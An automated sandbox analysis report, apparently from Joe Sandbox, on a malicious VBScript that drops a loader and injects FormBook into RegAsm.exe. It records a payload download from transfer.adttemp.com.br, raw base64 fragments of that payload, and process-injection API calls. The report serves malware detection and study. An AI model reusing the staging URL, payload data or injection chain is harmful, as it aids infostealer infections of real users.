Oct 4, 2024 11:26:54.623347998 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.623356104 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623377085 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623409986 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.623416901 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623446941 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.668311119 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.691755056 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.691904068 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.691946983 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.691956043 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.691987991 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692003965 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692059040 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692065954 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692107916 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692188025 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692253113 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692292929 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692347050 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692379951 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692441940 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692501068 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692562103 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692594051 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692648888 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692683935 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692742109 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692780018 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.692833900 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.692841053 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.693535089 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.693598986 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.699042082 CEST	49704	443	192.168.2.5	104.196.109.209

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 11:26:53.144841909 CEST	60379	53	192.168.2.5	1.1.1.1
Oct 4, 2024 11:26:53.175121069 CEST	53	60379	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 11:26:53.144841909 CEST	192.168.2.5	1.1.1.1	0x3529	Standard query (0)	transfer.adttemp.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 11:26:53.175121069 CEST	1.1.1.1	192.168.2.5	0x3529	No error (0)	transfer.adttemp.com.br		104.196.109.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.adttemp.com.br

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.196.109.209	443	5620	C:\Users\user\AppData\Local\Temp\temp_executable.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 09:26:54 UTC	93	OUT	GET /Io2SD/sirdeeeeee.txt HTTP/1.1 Host: transfer.adttemp.com.br Connection: Keep-Alive
2024-10-04 09:26:54 UTC	313	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 09:26:54 GMT Server: Transfer.sh HTTP Server 1.0 Content-Disposition: attachment; filename="sirdeeeeee.txt" Content-Length: 382988 Content-Type: text/plain; charset=utf-8 X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Connection: close
2024-10-04 09:26:54 UTC	3783	IN	Data Raw: 4d 4a 56 4a 41 56 77 38 64 63 38 7a 6e 63 4b 76 78 58 46 52 6b 7a 37 33 44 35 46 72 77 52 41 6a 69 35 6e 72 33 66 69 73 2b 39 6d 4f 55 49 54 32 2f 67 66 41 41 6d 68 6b 4d 51 33 67 6c 70 36 66 67 4f 39 4e 44 38 41 6d 50 6e 4b 49 79 4b 6d 46 54 65 36 4f 37 41 4a 45 76 79 74 66 61 34 75 32 48 4f 63 52 6e 72 68 44 68 34 7a 64 37 4b 66 51 2b 30 43 51 4c 61 4a 70 54 39 7a 4f 30 50 38 71 52 4f 51 7a 4d 76 41 70 6f 6f 49 42 43 2f 76 74 63 50 2b 43 2f 35 2f 41 55 45 75 64 6a 76 73 2f 4d 57 78 65 36 4a 6c 44 46 45 43 34 2b 6f 31 6a 4b 62 33 66 41 45 53 49 4f 63 47 78 56 59 75 65 56 6e 4b 5a 52 65 78 56 5a 52 70 58 70 50 34 4c 48 6e 34 74 2f 6b 74 52 41 6b 50 30 77 77 42 70 37 75 67 71 76 55 4e 36 4a 73 37 30 48 78 56 56 4e 75 4f 73 78 34 54 4c 48 34 5a 49 73 4a 42 Data Ascii: MJVJAVw8dc8zncKvxXFRkz73D5FrwRAji5nr3fis+9mOUIT2/gfAAmhkMQ3glp6fgO9ND8AmPnKIyKmFTe6O7AJEvytfa4u2HOcRnrhDh4zd7KfQ+0CQLaJpT9zO0P8qROQzMvApooIBC/vtcP+C/5/AUEudjvs/MWxe6JlDFEC4+o1jKb3fAESIOcGxVYueVnKZRexVZRpXpP4LHn4t/ktRAkP0wwBp7ugqvUN6Js70HxVVNuOsx4TLH4ZIsJB
2024-10-04 09:26:54 UTC	4409	IN	Data Raw: 79 7a 78 6d 45 6f 76 59 6f 42 31 47 32 68 42 76 6a 39 36 6a 6c 54 71 46 6e 4d 31 50 32 78 6f 6d 56 39 68 48 46 79 5a 37 62 46 30 79 59 31 62 48 70 42 46 75 6f 45 6a 56 57 66 54 53 52 4b 43 59 53 75 44 64 45 47 47 4f 74 30 65 6f 45 55 6e 68 74 33 6e 64 47 49 4c 57 56 51 69 44 52 63 50 30 51 61 75 59 62 47 43 31 4a 51 72 6d 4e 63 49 47 6f 79 52 33 43 69 62 4a 68 72 65 66 46 48 46 6f 44 32 76 49 4d 6e 75 79 37 31 2b 64 76 2f 62 62 41 41 5a 54 41 35 51 44 53 55 30 59 62 4e 52 41 44 41 30 38 45 47 41 63 6e 54 31 6c 56 78 55 58 66 51 41 79 56 38 5a 69 5a 63 41 4b 38 73 34 6f 45 78 4f 65 30 4e 6b 2f 46 78 48 76 48 67 68 36 67 39 55 6a 78 37 50 5a 62 6e 48 44 72 6e 47 4d 41 50 68 50 68 74 79 78 77 4f 7a 7a 53 4c 70 55 46 6e 5a 6a 6d 38 46 31 4b 58 6d 6b 39 52 6b Data Ascii: yzxmEovYoB1G2hBvj96jlTqFnM1P2xomV9hHFyZ7bF0yY1bHpBFuoEjVWfTSRKCYSuDdEGGOt0eoEUnht3ndGILWVQiDRcP0QauYbGC1JQrmNcIGoyR3CibJhrefFHFoD2vIMnuy71+dv/bbAAZTA5QDSU0YbNRADA08EGAcnT1lVxUXfQAyV8ZiZcAK8s4oExOe0Nk/FxHvHgh6g9Ujx7PZbnHDrnGMAPhPhtyxwOzzSLpUFnZjm8F1KXmk9Rk
2024-10-04 09:26:54 UTC	3591	IN	Data Raw: 4e 2f 4e 79 4c 44 41 36 34 69 62 41 39 62 32 70 4c 76 6f 59 76 43 34 35 55 45 55 31 6f 7a 44 39 36 2f 66 53 32 35 7a 74 62 7a 48 34 4b 6e 52 47 2b 51 56 67 56 54 78 52 45 75 4b 64 47 4e 76 6b 32 59 55 54 2b 4e 57 52 63 49 32 79 6f 68 57 71 51 78 77 56 52 6b 41 61 50 36 2b 68 4e 42 57 65 33 4f 43 65 71 62 62 5a 49 54 50 33 77 6a 77 43 54 72 54 64 52 79 49 76 61 66 61 35 33 70 76 55 37 34 43 71 44 79 30 53 76 77 56 79 77 77 2b 74 33 4d 74 7a 62 4e 43 30 54 2f 6e 45 56 5a 57 32 4c 77 46 7a 33 42 6c 70 66 4d 64 49 6e 56 4d 79 37 53 42 41 38 51 6e 48 59 6f 37 41 39 4c 4b 38 38 6a 6f 75 30 70 32 45 2f 63 4b 45 78 48 50 38 46 67 74 4c 71 6b 58 52 4e 50 63 49 52 4a 45 72 61 54 4e 52 44 6c 79 65 51 68 43 71 6c 56 73 32 6a 43 6d 34 48 6a 77 49 2f 45 38 7a 77 30 30 Data Ascii: N/NyLDA64ibA9b2pLvoYvC45UEU1ozD96/fS25ztbzH4KnRG+QVgVTxREuKdGNvk2YUT+NWRcI2yohWqQxwVRkAaP6+hNBWe3OCeqbbZITP3wjwCTrTdRyIvafa53pvU74CqDy0SvwVyww+t3MtzbNC0T/nEVZW2LwFz3BlpfMdInVMy7SBA8QnHYo7A9LK88jou0p2E/cKExHP8FgtLqkXRNPcIRJEraTNRDlyeQhCqlVs2jCm4HjwI/E8zw00
2024-10-04 09:26:54 UTC	4601	IN	Data Raw: 31 51 5a 74 78 55 68 33 6e 36 6f 46 59 78 38 77 58 45 6b 4d 72 7a 78 41 74 51 77 34 49 6f 64 63 72 32 6d 69 36 79 5a 55 4c 2f 50 34 5a 52 4d 2f 2f 64 39 79 47 49 65 4a 53 48 51 33 37 55 55 4a 37 37 58 70 74 51 35 4e 4e 49 57 72 46 41 62 33 36 74 4e 43 64 56 64 37 35 54 55 66 78 2f 53 7a 67 52 79 4e 76 6f 37 39 32 4f 38 71 4e 75 49 4c 32 71 73 70 32 55 6e 38 6a 54 52 2b 73 73 6b 2b 71 53 50 45 6f 56 6e 50 47 65 37 42 6a 73 4c 7a 53 4b 59 63 71 73 31 36 4f 30 4f 4c 34 37 61 41 77 50 4c 65 36 73 37 48 33 31 61 53 36 67 4f 56 6d 2b 4d 35 48 48 32 36 68 77 70 79 4d 57 57 4e 63 32 63 39 6f 48 30 6b 6a 53 2f 39 38 47 4f 6a 34 46 49 75 58 57 4d 2f 49 78 5a 77 75 71 75 47 49 32 52 37 4a 61 31 39 6a 43 65 7a 63 4f 6c 4c 74 62 44 34 2b 53 6a 41 4c 65 35 78 43 38 38 Data Ascii: 1QZtxUh3n6oFYx8wXEkMrzxAtQw4Iodcr2mi6yZUL/P4ZRM//d9yGIeJSHQ37UUJ77XptQ5NNIWrFAb36tNCdVd75TUfx/SzgRyNvo792O8qNuIL2qsp2Un8jTR+ssk+qSPEoVnPGe7BjsLzSKYcqs16O0OL47aAwPLe6s7H31aS6gOVm+M5HH26hwpyMWWNc2c9oH0kjS/98GOj4FIuXWM/IxZwuquGI2R7Ja19jCezcOlLtbD4+SjALe5xC88
2024-10-04 09:26:54 UTC	3399	IN	Data Raw: 50 57 33 6b 6e 55 75 77 76 78 6d 77 62 4a 50 4f 53 49 77 42 42 55 4c 4e 74 63 4f 6a 44 57 33 42 54 6f 6e 4e 70 63 6e 57 70 37 37 45 34 51 71 62 58 77 65 76 43 62 52 30 7a 64 61 56 34 4f 75 63 67 41 61 79 45 39 62 58 6f 48 70 57 62 57 48 4b 73 34 32 48 6c 32 6d 6b 49 59 33 61 55 38 4d 73 30 46 51 4a 67 33 69 51 4b 35 57 4b 38 39 4a 79 63 59 62 69 46 57 56 46 37 4c 78 54 45 62 68 70 62 4c 4e 6a 73 32 77 56 39 7a 64 2b 63 55 35 37 67 71 37 36 62 49 6b 63 39 49 73 4a 74 54 71 71 38 35 68 74 53 33 63 6e 32 5a 70 70 33 6f 6c 34 47 76 41 6f 62 58 73 75 70 47 75 37 4b 57 62 64 56 64 34 52 36 58 62 42 79 79 6e 50 7a 4b 64 64 7a 54 39 71 37 38 34 68 41 4f 46 51 79 67 2b 69 61 56 59 31 42 69 34 45 5a 62 75 59 49 53 33 4b 61 48 58 52 6f 50 4e 44 2b 57 50 35 48 6f 44 Data Ascii: PW3knUuwvxmwbJPOSIwBBULNtcOjDW3BTonNpcnWp77E4QqbXwevCbR0zdaV4OucgAayE9bXoHpWbWHKs42Hl2mkIY3aU8Ms0FQJg3iQK5WK89JycYbiFWVF7LxTEbhpbLNjs2wV9zd+cU57gq76bIkc9IsJtTqq85htS3cn2Zpp3ol4GvAobXsupGu7KWbdVd4R6XbByynPzKddzT9q784hAOFQyg+iaVY1Bi4EZbuYIS3KaHXRoPND+WP5HoD
2024-10-04 09:26:54 UTC	4793	IN	Data Raw: 54 36 4c 4d 5a 51 44 45 4b 5a 31 37 64 75 72 44 6a 2f 33 4e 36 78 41 65 72 6c 59 48 46 47 34 72 74 73 2f 56 59 44 4f 2f 69 59 51 50 76 32 45 61 6d 4c 34 4e 31 41 4b 4d 5a 52 2b 31 33 33 41 71 2f 52 54 57 30 57 63 41 61 52 36 31 2b 6b 53 35 37 74 47 73 67 4d 4e 51 64 70 43 35 49 62 6d 2f 46 43 43 53 65 52 6a 59 50 4e 4b 35 7a 72 75 73 47 31 4f 35 30 33 56 33 6a 64 69 36 33 33 4b 56 55 61 79 48 30 6d 74 73 64 57 57 54 33 6d 79 30 4f 69 36 6c 4a 44 4e 44 64 33 6d 76 2f 7a 7a 55 6f 34 2b 56 4c 70 70 66 41 32 48 6f 6a 6b 41 47 69 75 74 59 32 47 65 30 45 74 62 44 4b 55 4f 6a 69 56 33 73 61 39 62 45 55 68 31 2f 35 66 75 38 4c 63 63 6a 72 58 6a 72 67 75 4a 37 51 45 4b 31 77 50 30 50 64 63 79 59 77 77 73 53 61 4b 51 43 4c 66 59 56 48 77 34 44 58 58 66 64 56 4d 77 Data Ascii: T6LMZQDEKZ17durDj/3N6xAerlYHFG4rts/VYDO/iYQPv2EamL4N1AKMZR+133Aq/RTW0WcAaR61+kS57tGsgMNQdpC5Ibm/FCCSeRjYPNK5zrusG1O503V3jdi633KVUayH0mtsdWWT3my0Oi6lJDNDd3mv/zzUo4+VLppfA2HojkAGiutY2Ge0EtbDKUOjiV3sa9bEUh1/5fu8LccjrXjrguJ7QEK1wP0PdcyYwwsSaKQCLfYVHw4DXXfdVMw
2024-10-04 09:26:54 UTC	3207	IN	Data Raw: 4c 6e 41 63 76 53 7a 68 56 43 30 72 47 79 67 5a 65 44 38 42 70 4c 48 73 6a 59 2f 53 75 51 2b 6e 55 6f 47 36 63 2b 63 31 79 31 6c 51 64 38 67 4e 69 66 41 73 78 72 75 34 6f 43 4d 69 30 7a 76 34 69 32 33 6e 36 4f 7a 63 44 62 79 4b 35 58 4f 34 39 6f 79 47 6b 47 34 58 44 34 78 42 50 36 44 7a 67 61 67 41 6d 50 79 31 78 54 39 47 45 4f 73 68 38 54 78 51 59 74 5a 59 74 79 51 4b 4b 48 2b 39 44 53 56 34 5a 4e 30 6b 69 53 61 79 43 6c 77 4e 56 56 65 68 2f 73 35 33 72 73 67 55 53 36 75 34 43 75 37 57 74 77 42 75 75 42 78 64 76 42 57 54 4a 42 72 47 6e 49 38 62 33 79 68 36 6b 52 43 35 48 7a 44 44 2b 6e 74 39 43 78 47 51 70 4e 6d 55 71 69 68 54 53 41 44 57 4e 68 31 76 30 33 61 49 2b 30 35 58 42 49 55 56 34 35 5a 61 55 70 4d 53 59 6d 69 4c 66 33 61 69 2b 6f 6a 6d 63 70 52 Data Ascii: LnAcvSzhVC0rGygZeD8BpLHsjY/SuQ+nUoG6c+c1y1lQd8gNifAsxru4oCMi0zv4i23n6OzcDbyK5XO49oyGkG4XD4xBP6DzgagAmPy1xT9GEOsh8TxQYtZYtyQKKH+9DSV4ZN0kiSayClwNVVeh/s53rsgUS6u4Cu7WtwBuuBxdvBWTJBrGnI8b3yh6kRC5HzDD+nt9CxGQpNmUqihTSADWNh1v03aI+05XBIUV45ZaUpMSYmiLf3ai+ojmcpR
2024-10-04 09:26:54 UTC	4985	IN	Data Raw: 5a 65 32 65 42 30 79 4c 38 5a 31 75 79 35 4c 65 4d 44 7a 4a 6a 71 30 54 37 53 7a 70 58 33 64 44 57 6e 47 5a 6d 6c 31 49 30 7a 44 70 33 45 49 5a 6c 49 5a 48 54 67 63 6e 72 63 77 66 5a 4f 54 6b 74 47 39 47 68 57 42 4c 63 6e 37 6b 62 37 63 6a 63 6e 30 4c 6e 35 47 67 66 72 69 68 4b 5a 4e 59 50 54 56 53 2b 34 62 52 31 74 4b 49 70 79 39 73 48 76 37 76 74 71 79 46 44 57 65 51 66 65 61 54 36 4e 75 79 50 49 58 58 33 4f 63 4a 46 35 6b 6d 39 2b 6b 64 4a 6b 2b 59 64 49 63 54 4c 56 62 70 53 76 39 43 49 6a 59 4e 75 37 36 4f 50 2f 4c 75 4a 51 76 65 4e 30 6f 39 59 51 5a 6b 58 73 56 54 31 56 69 2b 74 6b 45 78 34 53 2f 52 30 63 2f 62 58 42 67 62 79 5a 49 45 67 44 35 56 56 43 4d 77 49 68 63 4a 6c 77 45 4f 4d 74 74 39 77 66 4f 6e 68 37 54 6b 66 63 66 51 54 6e 73 55 54 62 77 Data Ascii: Ze2eB0yL8Z1uy5LeMDzJjq0T7SzpX3dDWnGZml1I0zDp3EIZlIZHTgcnrcwfZOTktG9GhWBLcn7kb7cjcn0Ln5GgfrihKZNYPTVS+4bR1tKIpy9sHv7vtqyFDWeQfeaT6NuyPIXX3OcJF5km9+kdJk+YdIcTLVbpSv9CIjYNu76OP/LuJQveN0o9YQZkXsVT1Vi+tkEx4S/R0c/bXBgbyZIEgD5VVCMwIhcJlwEOMtt9wfOnh7TkfcfQTnsUTbw
2024-10-04 09:26:54 UTC	3015	IN	Data Raw: 58 58 52 35 37 37 38 32 58 66 37 2f 32 2f 6d 49 4a 48 68 50 32 68 2b 54 44 74 74 70 46 4b 2f 6c 2b 77 32 41 45 76 33 4c 79 4b 63 53 76 70 36 59 34 39 72 4f 53 36 58 62 4e 69 33 36 38 2f 6e 4f 63 54 31 78 53 4e 41 6a 70 67 46 77 69 6a 6b 4c 4d 34 41 51 52 6a 56 57 63 48 5a 69 35 54 77 56 36 56 34 68 33 62 35 6a 4a 59 6e 49 37 6e 39 4b 55 6a 76 36 71 66 5a 6d 4a 51 2b 33 69 68 67 77 41 58 66 79 35 6f 6a 49 76 45 2f 57 68 6a 66 7a 6c 4d 75 4c 35 62 62 44 4d 30 65 6f 72 4a 48 36 72 39 73 73 37 38 38 4b 76 37 73 46 66 6d 56 35 78 70 4d 33 53 4e 72 38 47 31 43 68 36 38 32 58 42 34 47 76 73 54 52 6d 68 44 39 73 2f 66 76 4b 6d 4f 2b 79 65 57 4f 67 6d 71 30 43 58 48 54 69 34 48 70 7a 6b 6c 63 39 62 7a 37 2b 62 6b 70 73 45 51 54 57 31 6d 68 47 4d 4c 4c 75 6b 42 30 Data Ascii: XXR57782Xf7/2/mIJHhP2h+TDttpFK/l+w2AEv3LyKcSvp6Y49rOS6XbNi368/nOcT1xSNAjpgFwijkLM4AQRjVWcHZi5TwV6V4h3b5jJYnI7n9KUjv6qfZmJQ+3ihgwAXfy5ojIvE/WhjfzlMuL5bbDM0eorJH6r9ss788Kv7sFfmV5xpM3SNr8G1Ch682XB4GvsTRmhD9s/fvKmO+yeWOgmq0CXHTi4Hpzklc9bz7+bkpsEQTW1mhGMLLukB0
2024-10-04 09:26:54 UTC	5177	IN	Data Raw: 48 41 45 35 65 4a 67 6a 52 76 44 36 35 74 73 65 65 6c 43 6e 76 76 69 4a 42 58 78 55 51 70 6f 77 35 4b 73 71 63 34 47 65 67 41 44 6b 44 6f 59 77 30 64 45 6c 78 56 72 51 49 52 67 32 71 4a 79 4a 33 75 54 55 52 41 70 34 73 6a 33 61 78 55 56 6b 39 6d 61 4d 30 5a 7a 45 38 69 32 55 35 38 65 77 4b 50 58 51 63 36 76 4b 65 61 61 79 39 39 33 6f 4a 39 61 74 36 54 41 49 51 77 44 6e 50 4d 75 74 34 74 4e 47 36 4e 6a 48 4f 79 33 38 71 45 68 66 47 79 56 73 51 6a 4b 4d 4e 79 64 35 46 6c 78 39 38 76 59 6c 76 47 73 47 30 34 2f 79 42 38 6f 37 68 68 73 4c 4f 4a 43 55 38 78 6e 54 32 79 42 6a 4e 78 4f 7a 70 46 6a 50 46 73 4e 41 39 44 68 74 74 67 49 61 4f 56 79 2f 50 30 6d 4f 71 6a 62 66 45 50 76 41 67 66 70 4d 7a 30 56 52 66 4e 32 61 56 62 39 71 78 65 79 34 6d 77 75 34 59 47 49 Data Ascii: HAE5eJgjRvD65tseelCnvviJBXxUQpow5Ksqc4GegADkDoYw0dElxVrQIRg2qJyJ3uTURAp4sj3axUVk9maM0ZzE8i2U58ewKPXQc6vKeaay993oJ9at6TAIQwDnPMut4tNG6NjHOy38qEhfGyVsQjKMNyd5Flx98vYlvGsG04/yB8o7hhsLOJCU8xnT2yBjNxOzpFjPFsNA9DhttgIaOVy/P0mOqjbfEPvAgfpMz0VRfN2aVb9qxey4mwu4YGI

Target ID:	0
Start time:	05:26:50
Start date:	04/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Imagebase:	0x7ff7e3f70000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:26:52
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Imagebase:	0xe30000
File size:	54'784 bytes
MD5 hash:	4BB2987F85F87A6488CE3152D6B85077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:26:54
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x9c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.5%
Total number of Nodes:	85
Total number of Limit Nodes:	5

Executed Functions

Function 02FA3558 Relevance: 1.9, Strings: 1, Instructions: 615
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 02FA3D55

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: (
API String ID: 3559483778-3887548279
Opcode ID: 48082a82c9a96d91d35d3842a40a2e7a4e8bcc7303a9e280e3f6864fdb720d1b
Instruction ID: 1d84881c4a1597d6f1e027cdba8e1e499e6b5cd2350cc054e88e4d8bd02ca64a
Opcode Fuzzy Hash: 48082a82c9a96d91d35d3842a40a2e7a4e8bcc7303a9e280e3f6864fdb720d1b
Instruction Fuzzy Hash: 2552BF74E012288FDB64DF69C894BDDBBB2BF89340F1081EAD509AB255DB349E85CF50

Function 02FA1930 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c87d8f9ea51d1884008139f0d1ab5bc3ff51f49daed191bb3819edd56806ca3
Instruction ID: 64f91d6cb8d11a4d3ea39cba253b2961fb4b9a4ce8fea7f826786157b63ad0bb
Opcode Fuzzy Hash: 7c87d8f9ea51d1884008139f0d1ab5bc3ff51f49daed191bb3819edd56806ca3
Instruction Fuzzy Hash: 71D1C0B4E01209CFCB18CFA9C594ADEBBB5BF89314F158269D409AB365D730A986CF50

Function 02FA41AC Relevance: 1.8, APIs: 1, Instructions: 274
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 02FA43ED

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c119cc0fe9410c24474c8cd125f22a15dda2049a961602eb661378227e9f200d
Instruction ID: c1bec8b242ae24ff285686e9fa610e4b0b74df1c20f4cd14a40ebd323ad0f8f7
Opcode Fuzzy Hash: c119cc0fe9410c24474c8cd125f22a15dda2049a961602eb661378227e9f200d
Instruction Fuzzy Hash: E3B179B0D00219DFDB20CFA9C9517EDBBF2EF48344F1481AAD909A7250DBB49986CF91

Function 02FA2D14 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 02FA43ED

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 58f3041bf7d27c8b88f85945986286b131b486dba1f8201045e0fdbcde2be0b6
Instruction ID: 09ee5e2ed30a16dfdc5c8dfc84af9a6503b47213f0dfeb86e539ccd75b5e9105
Opcode Fuzzy Hash: 58f3041bf7d27c8b88f85945986286b131b486dba1f8201045e0fdbcde2be0b6
Instruction Fuzzy Hash: 579159B1D00219CFDB20CFA8C9517DDBBB2EF44354F1485AAE909A7240DBB59986CF91

Function 02FA2DA0 Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02FA46F7

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5240f01ce87aa86f4723369ee6e3359aeea4a3614e7154693eeee239b4002f3f
Instruction ID: e6facb99ad7574e1bbd83853055f5cd6c02e1e2a0a9d18302ce5110be2551964
Opcode Fuzzy Hash: 5240f01ce87aa86f4723369ee6e3359aeea4a3614e7154693eeee239b4002f3f
Instruction Fuzzy Hash: 5C4182719093D59FCB129F79C8A4ACABFB0AF46314F0540D7D584DB263C6789809CBA2

Function 02FA47F8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 02FA488D

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 91bba23d5de006c1ea65817c8970442ca5b161bf5ef454b596c91d2e9e785ae4
Instruction ID: 16830c4c0362c7f735771594a0896e359d5e1abe985ab948375d97c337dafa12
Opcode Fuzzy Hash: 91bba23d5de006c1ea65817c8970442ca5b161bf5ef454b596c91d2e9e785ae4
Instruction Fuzzy Hash: D02127B19103499FCB10DFAAD885BDEBBF5FF48310F108429E918A7350D779A940CBA0

